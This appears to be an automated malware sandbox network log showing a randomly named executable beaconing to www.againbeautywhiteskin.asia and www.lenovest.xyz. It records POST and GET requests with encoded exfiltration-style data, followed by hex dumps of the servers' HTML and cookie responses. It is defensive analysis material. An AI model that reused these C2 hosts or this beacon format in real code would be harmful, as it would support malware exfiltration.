                                                                            Jun 19, 2024 22:39:49.305769920 CEST1236INData Raw: 5d f7 95 ca 82 a2 94 48 e3 d9 db 83 d0 b3 1f 5e f4 be 63 f7 04 99 9f 81 3e 0f bd 72 10 72 29 45 67 85 cd f7 7c 74 e4 ea d5 49 3d 95 96 52 5b 7e ca 71 5f 81 43 0b 84 1b be c2 0e f0 08 75 c1 7f 7e 9c 6e 63 ce fb db 81 04 bc 1c 6a 88 2a 72 b8 27 42
                                                                            Data Ascii: ]H^c>rr)Eg|tI=R[~q_Cu~ncj*r'BGkBV}kJ$D|@zZdaa]oY$"a}L}YRkFcH[)Rjp&EP/5@EQAIgnwoxGrp"~4k
                                                                            Jun 19, 2024 22:39:49.305804014 CEST1236INData Raw: a5 9d dc 73 46 1b 15 78 e2 5d 1c 7f fd 7c 7c b5 78 10 bc 95 36 57 60 39 1d 3f 0c f5 7b 60 03 58 ae 61 06 a4 b6 de 6c a8 ae 7a 0a ec a7 30 dc 40 ca c1 62 0b b2 45 54 9f 50 70 f4 12 e3 4d cf 4b 19 14 22 7f bc 97 f3 6f 36 b4 36 73 69 4f 49 f1 4b a0
                                                                            Data Ascii: sFx]||x6W`9?{`Xalz0@bETPpMK"o66siOIKR:TdWQSe+t)$lTe1-T*(8bvfMJ(?</OyJu~aGe"+LJS'V/nw2l:EcQJ[|:
                                                                            Jun 19, 2024 22:39:49.305852890 CEST1191INData Raw: 9d 26 65 93 d3 87 48 e0 9a 78 cf 58 cf f4 21 9f 6e 6f bb 6e 2a e3 98 82 62 ef 25 ec 24 5f 39 98 be d0 96 12 e4 75 1f 04 8d 86 17 51 39 61 a7 1c ec 84 bc 4b f8 b5 16 e0 b7 56 7c 30 f9 d4 5c 9f 71 09 39 10 45 b3 6f 7f 73 ac 2c 19 78 78 6a 1c f3 96
                                                                            Data Ascii: &eHxX!non*b%$_9uQ9aKV|0\q9Eos,xxj-gJPtNka=m,`8A.j,</7=6FfI'#!E\Js'po{!dv*'.kdN{_'z~uzC&0]iKG*IJL


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.44975913.228.81.39805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:50.963115931 CEST10831OUTPOST /3h10/ HTTP/1.1
                                                                            Host: www.againbeautywhiteskin.asia
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.againbeautywhiteskin.asia
                                                                            Referer: http://www.againbeautywhiteskin.asia/3h10/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 77 6b 78 72 55 39 6e 53 42 66 4f 4b 49 53 30 59 70 64 4d 72 77 34 70 33 2f 2f 68 53 75 46 33 62 50 4e 65 5a 48 78 45 54 59 76 73 74 6f 49 65 43 6b 42 39 52 68 72 31 55 39 48 4f 45 43 67 35 4f 4f 77 76 67 52 34 65 32 58 5a 4a 70 64 68 35 36 45 70 37 75 49 78 56 43 4d 74 51 7a 4f 6f 36 31 71 2b 59 68 49 56 72 67 48 53 2b 49 50 39 45 64 33 2f 57 64 33 54 47 42 6d 38 55 4b 50 4a 39 44 36 79 6d 58 68 69 53 30 34 74 6b 53 76 52 77 64 4f 66 62 77 66 77 44 45 51 72 31 70 4d 63 51 6f 77 31 31 46 63 4e 56 51 43 52 59 59 63 55 58 4f 4c 64 54 78 66 65 56 74 57 66 2b 57 6d 67 73 34 30 52 6e 55 38 62 7a 35 72 33 6e 69 62 7a 65 58 72 53 47 69 4a 39 36 52 64 6f 72 70 5a 32 34 62 50 55 37 6b 78 6f 6f 65 4c 75 61 61 48 34 43 54 48 39 36 63 47 70 37 39 47 43 61 6b 4c 4d 75 75 41 36 53 74 6d 4d 6d 6e 52 51 72 69 2b 2f 59 78 4e 45 65 55 58 39 30 2b 65 59 72 76 48 45 2b 49 4a 73 53 64 4d 65 6b 4b 73 52 62 6e 66 50 67 4c 41 45 48 77 70 37 4d 66 30 30 73 71 51 73 63 31 4c 6b 62 53 59 42 49 4f 5a 57 67 [TRUNCATED]
                                                                            Data Ascii: tF1tk6=wkxrU9nSBfOKIS0YpdMrw4p3//hSuF3bPNeZHxETYvstoIeCkB9Rhr1U9HOECg5OOwvgR4e2XZJpdh56Ep7uIxVCMtQzOo61q+YhIVrgHS+IP9Ed3/Wd3TGBm8UKPJ9D6ymXhiS04tkSvRwdOfbwfwDEQr1pMcQow11FcNVQCRYYcUXOLdTxfeVtWf+Wmgs40RnU8bz5r3nibzeXrSGiJ96RdorpZ24bPU7kxooeLuaaH4CTH96cGp79GCakLMuuA6StmMmnRQri+/YxNEeUX90+eYrvHE+IJsSdMekKsRbnfPgLAEHwp7Mf00sqQsc1LkbSYBIOZWgRTQdvHT1JqtQ9sYk+z7s1ZaUX5smgLXuZe7EhtO7PgwFqL+fXT8Oo691isMu/aNw1UjmAU8uTUV5UcYIBJEY/lOHQpnjwYIQ+Q4owCyjmEAWFisUXW6bvCbbNBhstcEIf8isN1kdH41+i3l1Gw+bs12WfyPHnHBhUDfmwgEff+AJd4FXurPrBnwOhLHb0uHMLmpJrrwroGUW+wynV8NKLXDBgII6kHDp1dMtDcCR2Y+gRUVTIUKv/iRCpaL1NbN87CjXFKGYOkdVCr54m0OLeJg6u5+IvTq17ZAzzFDE6vwtnJs/8T0vKpGUFB9XoefN6dR+Ez1YgYW2uvQUiLxEf+YDollzmx/nlEtiifRJd3bkJKjnC1fKDHSmDbyNBRI/xJdYFDxQXA4eYxM4+jjO1Iq4s/BQBFvV5Jl1tGrTJi3BOpgEfQNyFn/1/gpu4JUKesWVJF9dn5l96oaDuGop26HPGrGlaivqHPnWKnLC+o1VQJOEquBb0ZYi5GoXrXQprAdzYwJqu5rsw9v4kpEKqQ4tgBCaMjgMbEa+TTC6/ibWNg1seX5ec2NXdviDVJ1gFyD40F4wEnddDvfq0KVgN/sp7p8QuuuYz9c6wwPoyAysKyoWY5hYcxUTXMTYeABa6KiZtSI5dYx9pmd6jFH2mkY4XfoL5bPI0G [TRUNCATED]
                                                                            Jun 19, 2024 22:39:52.176877975 CEST1236INHTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Wed, 19 Jun 2024 20:39:52 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p
                                                                            Data Raw:
                                                                            Data Ascii:
                                                                            Jun 19, 2024 22:39:52.176923037 CEST224INData Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f
                                                                            Data Ascii: pupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2024-06-19 20:39:51.98818891
                                                                            Jun 19, 2024 22:39:52.176981926 CEST1236INData Raw: 39 20 2b 30 30 30 30 20 55 54 43 20 6d 3d 2b 34 31 33 35 35 32 2e 33 36 35 37 34 37 33 33 31 22 3b 20 45 78 70 69 72 65 73 3d 53 61 74 2c 20 31 37 20 4a 75 6e 20 32 30 33 34 20 32 30 3a 33 39 3a 35 31 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b 69
                                                                            Data Ascii: 9 +0000 UTC m=+413552.365747331"; Expires=Sat, 17 Jun 2034 20:39:51 GMTSet-Cookie: LADI_CLIENT_ID=213fa4e7-fc1a-4a5f-6995-89303f950cd9; Expires=Sat, 17 Jun 2034 20:39:51 GMTSet-Cookie: LADI_PAGE_VIEW=0; Path=/3h10; Expires=Sat, 17 Jun 2034
                                                                            Jun 19, 2024 22:39:52.177031040 CEST1236INData Raw: 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30
                                                                            Data Ascii: Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cooki
                                                                            Jun 19, 2024 22:39:52.177086115 CEST569INData Raw: 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f
                                                                            Data Ascii: ax-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIO
                                                                            Jun 19, 2024 22:39:52.177123070 CEST1236INData Raw: 31 34 30 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 3c db 8e db 48 76 bf 52 d6 62 a6 25 b8 a8 96 ba 5b 7d 91 5a 3d f1 38 4e 76 80 c1 8e 31 e3 d9 ec c2 70 8c 12 59 92 38 4d 91 34 49 f5 c5 da 7e 08 f2 98 87 60 9f f3 92 c1 60 10 20 40 80 20 c8 d3 fa
                                                                            Data Ascii: 140c<HvRb%[}Z=8Nv1pY8M4I~`` @ SU$d-YS^.</~'Tsv#E1Oo_u:;Mg](${1n=e[O?Elx>xi;-u/67E$H
                                                                            Jun 19, 2024 22:39:52.177175045 CEST1236INData Raw: 1c ee ec 8c d2 47 01 4b 88 7d a5 d8 6a 43 4c c2 c2 98 0f d3 07 25 41 0b f4 c7 16 22 95 44 69 42 3c 0c 41 12 8b d8 12 74 61 91 c5 9c ef 96 b1 84 2e 05 50 53 15 d4 55 28 b9 1a 6b 6f ba 01 68 c9 14 22 27 6b ee 3a 0e f7 57 e9 fb 50 be df 08 47 69 25
                                                                            Data Ascii: GK}jCL%A"DiB<Ata.PSU(koh"'k:WPGi%83W%)^|9Vkn~WaO+P"SHmM:{|[KuXM}j;h6aRz;FEP:uHqp-v1NG%61@pEk$F
                                                                            Jun 19, 2024 22:39:52.177210093 CEST1236INData Raw: 5d 1e 60 fa 46 a8 6c ae 83 f7 89 cb a6 03 d7 d4 3c d8 ae 1b 2c e4 a0 07 8a cb b0 d3 56 0a bb a6 ae 07 3f c0 12 3c 90 6b f7 07 9f 7c a0 b5 35 d0 3a 9c 23 6d 2b 35 a2 b6 fd 7e ff 43 e5 fb 17 1f 63 b4 a1 c7 e2 c4 b2 f1 22 9b 3a 02 b3 d4 5c ff c8 5d
                                                                            Data Ascii: ]`Fl<,V?<k|5:#m+5~Cc":\]6'iVSmzo=}Wz>O7#bl}JiGmrPbZsS;C]^Vw\=,pE2Tb&,i<#)7h\Or$j&exXG
                                                                            Jun 19, 2024 22:39:52.177242041 CEST1236INData Raw: 77 5c 46 da f9 b2 ef e8 10 6f 7d ae 54 b0 b6 f4 3c 51 9c 3b ee 8b cb f2 79 a7 b8 31 6a 0d a0 86 3c 26 83 de 27 9d 82 43 31 64 4a d1 0f 50 33 a6 96 10 cb 31 cb 56 9c 47 87 47 39 66 6a 93 44 71 1c 34 d5 92 b3 79 96 7e c3 ba 4a e7 f7 ac 24 fb 6a d0
                                                                            Data Ascii: w\Fo}T<Q;y1j<&'C1dJP31VGG9fjDq4y~J$jx[YKxHK,M1Ys/.sRGe$&9(R(+m!l0{G0Lq@~1nmS;7oS=l%1?JX6B
                                                                            Jun 19, 2024 22:39:52.177277088 CEST196INData Raw: de 89 e7 2e ba 03 21 41 d9 bf 45 3e fd b4 cc 20 a8 2d 0e 2a 64 99 2c 23 7f 74 93 29 b5 44 fb 19 c2 44 d2 39 70 bc bd 23 21 ec d0 02 42 b8 95 70 87 67 c9 2d 24 fe fc fa 29 b2 f3 57 6c c1 ab ac 84 d5 a3 c7 db 4d a6 81 69 f6 6b 65 d5 d3 65 25 09 30
                                                                            Data Ascii: .!AE> -*d,#t)DD9p#!Bpg-$)WlMikee%0+O\RGX%gUoi ]]{{{{^?hw%1}eY*<I4(tWag


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.44976013.228.81.39805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:53.502044916 CEST444OUTGET /3h10/?tF1tk6=9mZLXJL8GvO5ODxaoOomsqt4kv5XiFfxC+OCFBImS8kNzrmbjyRfioF27F6qemRmHzSdXM7CT4wlEWpleIDtHTdpL9gTGqilltwgGUv9YmP3AeMh48KIxzc=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1
                                                                            Host: www.againbeautywhiteskin.asia
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:39:54.473053932 CEST1236INHTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Wed, 19 Jun 2024 20:39:54 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p
                                                                            Data Raw:
                                                                            Data Ascii:
                                                                            Jun 19, 2024 22:39:54.473103046 CEST1236INData Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f
                                                                            Data Ascii: pupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2024-06-19 20:39:54.29497422 +0000 UTC m=+41355
                                                                            Jun 19, 2024 22:39:54.473134995 CEST1236INData Raw: 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 46 4f
                                                                            Data Ascii: Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/3h10; Max-Age
                                                                            Jun 19, 2024 22:39:54.473169088 CEST1236INData Raw: 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50 41
                                                                            Data Ascii: e: LADI_CAMP_PAGE_VIEW=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cookie
                                                                            Jun 19, 2024 22:39:54.473201036 CEST896INData Raw: 6e 65 72 57 69 64 74 68 29 3b 77 69 6e 64 6f 77 2e 6c 61 64 69 5f 69 73 5f 64 65 73 6b 74 6f 70 20 3d 20 77 69 64 74 68 20 3e 20 37 36 38 3b 76 61 72 20 63 6f 6e 74 65 6e 74 20 3d 20 22 22 3b 69 66 20 28 21 77 69 6e 64 6f 77 2e 6c 61 64 69 5f 69
                                                                            Data Ascii: nerWidth);window.ladi_is_desktop = width > 768;var content = "";if (!window.ladi_is_desktop) {content = "width=420, user-scalable=no";} else {content = "width=960, user-scalable=no";}var docViewport = document.createElement("meta");docViewport
                                                                            Jun 19, 2024 22:39:54.473234892 CEST1236INData Raw: 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f
                                                                            Data Ascii: /" crossorigin><link rel="preload" href="https://fonts.googleapis.com/css?family=Open Sans:bold,regular&display=swap" as="style" onload="this.onload = null;this.rel = 'stylesheet';"><style id="style_ladi" type="text/css">a,abbr,acronym,address
                                                                            Jun 19, 2024 22:39:54.473267078 CEST1236INData Raw: 75 73 74 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 6e 6f 6e 65 7d 2e 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 6c 61 64 69 2d 74 72 61 6e
                                                                            Data Ascii: ust:none;-webkit-text-size-adjust:none}.overflow-hidden{overflow:hidden}.ladi-transition{transition:all 150ms linear 0s}.ladipage-message{position:fixed;width:100%;height:100%;top:0;left:0;z-index:1000000000;background:rgba(0,0,0,.3)}.ladipage
                                                                            Jun 19, 2024 22:39:54.473299026 CEST1236INData Raw: 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 6c 61 64 69 2d 73 65 63 74 69 6f 6e 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 61 64 69 2d 73 65 63 74 69 6f 6e
                                                                            Data Ascii: t:100%;overflow:hidden}.ladi-section{margin:0 auto;position:relative}.ladi-section .ladi-section-arrow-down{position:absolute;width:36px;height:30px;bottom:0;right:0;left:0;margin:auto;background:url(https://w.ladicdn.com/v2/source/ladi-icons.
                                                                            Jun 19, 2024 22:39:54.473330021 CEST1236INData Raw: 73 69 74 69 6f 6e 3a 2d 32 38 70 78 7d 2e 6c 61 64 69 2d 63 61 72 6f 75 73 65 6c 20 2e 6c 61 64 69 2d 63 61 72 6f 75 73 65 6c 2d 61 72 72 6f 77 2d 72 69 67 68 74 7b 72 69 67 68 74 3a 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69
                                                                            Data Ascii: sition:-28px}.ladi-carousel .ladi-carousel-arrow-right{right:5px;background-position:-52px}.ladi-gallery{position:absolute;width:100%;height:100%}.ladi-gallery .ladi-gallery-view{position:absolute;overflow:hidden}.ladi-gallery .ladi-gallery-vi
                                                                            Jun 19, 2024 22:39:54.473364115 CEST1236INData Raw: 67 61 6c 6c 65 72 79 2d 76 69 65 77 3e 2e 73 65 6c 65 63 74 65 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 20 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d 76 69 65 77 3e 2e 73 65 6c 65 63 74 65 64 7b 6c 65
                                                                            Data Ascii: gallery-view>.selected{display:block}.ladi-gallery .ladi-gallery-view>.selected{left:0}.ladi-gallery .ladi-gallery-view>.next,.ladi-gallery .ladi-gallery-view>.prev{position:absolute;top:0;width:100%}.ladi-gallery .ladi-gallery-view>.next{left
                                                                            Jun 19, 2024 22:39:54.478180885 CEST1216INData Raw: 35 30 25 20 2d 20 31 38 70 78 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 2f 76 32 2f 73 6f 75 72 63 65 2f 6c 61 64 69 2d 69 63 6f 6e 73 2e 73 76 67 29 20 6e 6f 2d 72 65 70 65
                                                                            Data Ascii: 50% - 18px);background:url(https://w.ladicdn.com/v2/source/ladi-icons.svg) no-repeat;cursor:pointer;z-index:90000050}.ladi-gallery .ladi-gallery-view .ladi-gallery-view-arrow-left{left:5px;background-position:-28px}.ladi-gallery .ladi-gallery-


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.449761162.0.213.94805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:07.849802017 CEST690OUTPOST /e20q/ HTTP/1.1
                                                                            Host: www.lenovest.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.lenovest.xyz
                                                                            Referer: http://www.lenovest.xyz/e20q/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 62 4e 44 43 75 67 58 31 6e 58 47 4c 53 5a 75 75 4c 47 69 49 65 68 67 2f 39 57 73 30 7a 56 33 46 2f 4f 6b 49 62 7a 51 68 54 6d 34 42 61 38 6b 4f 63 72 72 61 56 42 6d 72 30 6e 47 70 49 5a 4f 38 4d 66 48 54 5a 55 6a 32 33 59 31 33 65 76 4a 72 64 71 57 54 61 34 72 64 56 6d 70 49 4e 64 61 46 57 4c 69 76 52 46 4b 49 44 77 37 4d 6c 49 57 43 51 6a 6b 66 34 43 53 5a 61 6d 63 62 65 61 70 52 6c 39 30 4a 6a 42 36 59 52 67 68 64 35 4e 6d 75 77 38 64 42 36 43 75 46 48 38 48 43 53 68 58 37 50 6f 37 32 41 53 62 51 75 79 44 47 39 31 54 48 34 75 66 74 5a 30 6f 37 66 7a 6e 71 62 78 30 62 35 41 3d 3d
                                                                            Data Ascii: tF1tk6=bNDCugX1nXGLSZuuLGiIehg/9Ws0zV3F/OkIbzQhTm4Ba8kOcrraVBmr0nGpIZO8MfHTZUj23Y13evJrdqWTa4rdVmpINdaFWLivRFKIDw7MlIWCQjkf4CSZamcbeapRl90JjB6YRghd5Nmuw8dB6CuFH8HCShX7Po72ASbQuyDG91TH4uftZ0o7fznqbx0b5A==
                                                                            Jun 19, 2024 22:40:08.470860004 CEST1236INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:40:08 GMT
                                                                            Server: Apache
                                                                            Content-Length: 16052
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                            Jun 19, 2024 22:40:08.470916986 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
